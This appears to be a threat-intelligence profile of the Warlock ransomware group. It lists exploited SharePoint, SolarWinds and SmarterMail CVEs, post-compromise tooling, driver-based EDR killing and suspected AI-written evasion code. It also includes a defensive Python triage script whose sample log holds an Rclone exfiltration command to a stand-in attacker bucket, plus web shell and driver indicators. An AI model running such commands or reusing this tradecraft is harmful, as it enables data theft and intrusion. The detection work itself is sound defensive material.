Warlock
Warlock is a ransomware group active since at least June 2025. Reporting also refers to it as WarLock, Warlock Group, Water Manaul, Storm-2603 and, in one Sophos-linked context, Gold Salem. Multiple sources attribute the group to Chinese threat actors: reporting states that Warlock Group (aka Storm-2603) is a ransomware gang attributed to Chinese actors, and ReliaQuest linked related activity to Storm-2603 with moderate-to-high confidence.

The group has been posting victims since June 2025 and reached 43 total listings in Q3 2025; other reporting says it hit more than 60 organizations in six months. Victim sectors mentioned in reporting include nuclear energy, aerospace, government, telecommunications, and organizations using SmarterMail/SmarterTrack. Named or claimed victims include Talal Abu-Ghazaleh Global, Hitachi, Primrose Oil Company, Colt Technology Service Group, Cleary Building Corporation, and SmarterTools-related environments.

Warlock is described as a closed ransomware group that does not rely on affiliates and develops proprietary EDR killers from scratch. ESET reports that Warlock deploys dozens of EDR killers per intrusion until one works, and that multiple samples showed patterns consistent with AI-assisted code generation; ESET strongly suspects Warlock uses artificial intelligence to help write and update its EDR killer code.

Initial access techniques described in reporting include exploitation of unpatched Microsoft SharePoint servers (reporting tied to CVE-2025-53770, with references to CVE-2025-49704, CVE-2025-49706, and CVE-2025-53771); exploitation of SolarWinds Web Help Desk vulnerabilities, including activity associated with CVE-2025-26399; and exploitation of SmarterMail vulnerabilities, including CVE-2026-23760 and CVE-2026-24423.

The group is also described as chaining zero-day vulnerabilities in some intrusions. For defense evasion, Warlock has used BYOVD techniques and signed Chinese drivers to disable antivirus or security products: reporting says the group previously used googleApiUtil64.sys and later NSecKrnl.sys to terminate security products at the kernel level, and that it neutralizes antivirus protections and repeatedly tries multiple EDR killers during a single intrusion.

Operational tooling mentioned in reporting includes TightVNC for persistence, PsExec for lateral movement, RDP Patcher for concurrent RDP sessions, Velociraptor for command-and-control or post-compromise activity, Visual Studio Code with Cloudflare Tunnel for tunneling C2 traffic, Yuze for intranet penetration and reverse proxy connectivity, Rclone for exfiltration to S3 buckets, SimpleHelp, vulnerable WinRAR versions, and web shells and files such as spinstall0.aspx, spinstall.aspx, spinstall1.aspx, spinstall2.aspx, IIS_Server_dll.dll, SharpHostInfo.x64.exe, xd.exe, and debug_dev.js.

The group uses double extortion. Its extortion note states that Warlock Group encrypts victim data, exfiltrates data, threatens public release or sale of stolen information, and offers decryption and deletion of stolen data in exchange for payment.
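The profile above names several file-level artifacts (the SharePoint web shells, the two BYOVD drivers, and Rclone exfiltration to S3). The following triage filter is an added example, not code from this page or from Mallory, that scans constructed Windows-style event lines for those artifacts and flags when the reported web shell plus kernel-driver combination appears together. The log lines are constructed for the example; matching on file names alone is a weak signal, since the names can be changed between intrusions, so in practice this belongs beside behavioural detections (unexpected .aspx writes under the SharePoint LAYOUTS path, unsigned or newly seen driver loads, cloud-storage uploads from servers).

```python
"""Filename-based triage for Warlock-reported artifacts (added example).

Indicator names come from the profile above; everything else (the log
format, the sample lines, the category labels) is constructed here.
"""
import re
from dataclasses import dataclass

# Web shell and tool file names listed in the reporting (lower-cased for matching).
WEB_SHELLS = {
    "spinstall0.aspx", "spinstall.aspx", "spinstall1.aspx", "spinstall2.aspx",
    "iis_server_dll.dll", "sharphostinfo.x64.exe", "xd.exe", "debug_dev.js",
}
# Signed drivers the reporting says were used to kill security products (BYOVD).
BYOVD_DRIVERS = {"googleapiutil64.sys", "nseckrnl.sys"}

# Pulls file names with the extensions we care about out of a free-text line.
FILE_TOKEN = re.compile(r"[\w\-.]+\.(?:aspx|dll|exe|js|sys)\b", re.IGNORECASE)
# Rclone remote syntax for S3-style targets, e.g. "s3:bucket/path" or "s3://".
S3_REMOTE = re.compile(r"\bs3[:/]")


@dataclass
class Hit:
    line_no: int      # 1-based index into the scanned log
    category: str     # web_shell | byovd_driver | exfil_rclone_s3
    indicator: str    # the matched file name or tool


def classify(line: str) -> list[tuple[str, str]]:
    """Return (category, indicator) pairs found in one log line."""
    found = []
    for token in FILE_TOKEN.findall(line):
        name = token.lower()
        if name in WEB_SHELLS:
            found.append(("web_shell", name))
        elif name in BYOVD_DRIVERS:
            found.append(("byovd_driver", name))
    lowered = line.lower()
    if "rclone" in lowered and S3_REMOTE.search(lowered):
        found.append(("exfil_rclone_s3", "rclone"))
    return found


def scan(lines: list[str]) -> list[Hit]:
    """Run classify() over every line and collect hits with line numbers."""
    return [
        Hit(no, cat, ind)
        for no, line in enumerate(lines, start=1)
        for cat, ind in classify(line)
    ]


def triage(lines: list[str]) -> dict:
    """Summarise hits and flag the web-shell-plus-EDR-killer pattern the
    reporting describes (SharePoint web shell followed by a BYOVD driver)."""
    hits = scan(lines)
    categories = {h.category for h in hits}
    return {
        "hits": hits,
        "counts": {c: sum(1 for h in hits if h.category == c) for c in sorted(categories)},
        "matches_reported_chain": {"web_shell", "byovd_driver"} <= categories,
    }


# Constructed sample events (not real telemetry); three malicious, one benign.
SAMPLE_LOG = [
    "2025-07-20 02:14:03 w3wp.exe wrote C:\\PROGRA~1\\COMMON~1\\MICROS~1\\WEBSER~1\\16\\TEMPLATE\\LAYOUTS\\spinstall0.aspx",
    "2025-07-20 02:15:41 services.exe loaded driver C:\\Windows\\Temp\\NSecKrnl.sys",
    "2025-07-20 02:16:09 cmd.exe spawned rclone.exe copy D:\\Finance s3:attacker-bucket/out",
    "2025-07-20 02:16:30 svchost.exe loaded driver C:\\Windows\\System32\\drivers\\ndis.sys",
]

if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    for h in result["hits"]:
        print(f"line {h.line_no}: {h.category} -> {h.indicator}")
    print("counts:", result["counts"])
    print("reported chain present:", result["matches_reported_chain"])
```

Running it against the constructed sample reports the web shell on line 1, the NSecKrnl.sys driver load on line 2, the Rclone-to-S3 copy on line 3, ignores the legitimate ndis.sys load, and sets the chain flag because both a web shell and a BYOVD driver appeared in the same window.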
Tradecraft
32 distinct techniques observed across reporting, grouped by tactic.
Associated malware families
4 malware families attributed to this actor across reporting.
Associated vulnerabilities
5 CVEs this actor has used in observed campaigns, all 5 exploited in the wild.
CVE-2014-8361 (CVSS score: 9.3) - Realtek SDK, IoT devices, network equipment. Associated actors: Warlock, Sinobi, Beast Link.
CVE-2025-26399 (CVSS score: 9.8) - A deserialization of untrusted data vulnerability in the AjaxProxy component of SolarWinds Web Help Desk that could allow an attacker to run commands on the host machine.
"Colt had an on-premise SharePoint server that had already been backdoored (via CVE-2025-53770) in the recent mass-hack wave by the time it was patched."
"CVE-2026-23760 is an authentication bypass flaw that could allow any user to reset the SmarterMail system administrator password by sending a specially crafted HTTP request."
"ReliaQuest said it identified activity likely linked to Warlock that involved the abuse of CVE-2026-23760 to bypass authentication and stage the ransomware payload..."
CVE-2026-24423, on the other hand, exploits a weakness in the ConnectToHub API method to achieve unauthenticated remote code execution (RCE).
Recent activity
20 sources tracked across advisories, community write-ups, and news.
Ransomware operations affecting more than 60 organizations in six months, with targeting focused on nuclear energy, aerospace, and government sectors. The group reportedly chains zero-days and disables antivirus software using signed Chinese drivers.
Secondary-tier ransomware actor contributing notable activity against Chinese organizations.
Cybercrime group referenced as an example of actors whose EDR-killer tooling may have been AI-assisted.
Develops proprietary EDR killer tools from scratch and is suspected of using AI to help write and update EDR killer code.